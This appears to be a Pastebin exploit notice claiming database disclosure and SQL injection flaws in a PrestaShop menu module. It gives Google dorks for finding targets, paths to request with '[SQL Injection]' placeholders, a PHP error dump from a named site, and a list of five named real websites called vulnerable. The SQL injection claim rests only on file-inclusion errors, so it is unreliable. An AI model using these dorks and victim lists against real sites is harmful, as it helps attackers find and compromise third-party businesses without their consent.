KingSkrupellos

PrestaShop PM_AdvancedTopMenu 1.4.6.2 Database Discl and SQL

Dec 23rd, 2018
173
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.23 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : PrestaShop PM_AdvancedTopMenu Modules 1.4.6.2 Database Disclosure and SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 24/12/2018
  6. # Vendor Homepage : prestashop.com
  7. # Software Download Link : presta-module.com/en/3-prestashop-addons/7-appearance/6-advanced-top-menu.html
  8. + prestashop.com/forums/topic/89175-module-pm-advancedtopmenu/
  9. + addons.prestashop.com/en/menu/2072-advanced-top-menu-responsive.html
  10. # Software Price : 50$
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Version Information : 1.4.10.0 - 1.4.7.0 - 1.4.6.2
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/modules/pm_advancedtopmenu/''
  16. intext:''Hexagone High-Tech se fournit chez''
  17. intext:''création: webncie // © Eight-Racing.com 2013-2014 tous droits réservés''
  18. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  19. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  20. CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  21.  
  22. #################################################################################################
  23.  
  24. # Database Disclosure Exploit :
  25.  
  26. /modules/pm_advancedtopmenu/install.sql
  27.  
  28. # SQL Injection Exploit :
  29.  
  30. /modules/pm_advancedtopmenu/pm_advancedtopmenu.php?id=[SQL Injection]
  31.  
  32. /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=[SQL Injection]
  33.  
  34. /modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php?id=[SQL Injection]
  35.  
  36. /modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php?id=[SQL Injection]
  37.  
  38. #################################################################################################
  39.  
  40. # Example SQL Database Error =>
  41.  
  42. Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php):
  43. failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/
  44. pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
  45.  
  46. Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php'
  47. for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules
  48. /pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
  49.  
  50. Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php):
  51. failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules
  52. /pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
  53.  
  54. Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu
  55. /AdvancedTopMenuColumnWrapClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
  56. in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
  57.  
  58. Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php):
  59. failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules
  60. /pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
  61.  
  62. Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu
  63. /AdvancedTopMenuColumnClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in
  64. /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
  65.  
  66. Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php):
  67. failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/
  68. modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
  69.  
  70. Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/
  71. AdvancedTopMenuElementsClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in
  72. /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
  73.  
  74. Fatal error: Class 'Module' not found in /home/hexago7/public_html/hexagone.mg/modules
  75. /pm_advancedtopmenu/pm_advancedtopmenu.php on line 23
  76.  
  77. Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg
  78. /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php on line 13
  79.  
  80. Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules
  81. /pm_advancedtopmenu/AdvancedTopMenuColumnClass.php on line 13
  82.  
  83. Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules
  84. /pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php on line 13
  85.  
  86. #################################################################################################
  87.  
  88. # Example Vulnerable Sites =>
  89.  
  90. [+] hexagone.mg/modules/pm_advancedtopmenu/install.sql
  91.  
  92. [+] griffin.ch/modules/pm_advancedtopmenu/install.sql
  93.  
  94. [+] eight-racing.com/modules/pm_advancedtopmenu/install.sql
  95.  
  96. [+] domaine-vial.fr/modules/pm_advancedtopmenu/install.sql
  97.  
  98. [+] tecnicamurciana.es/modules/pm_advancedtopmenu/install.sql
  99.  
  100. #################################################################################################
  101.  
  102. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
  103.  
  104. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment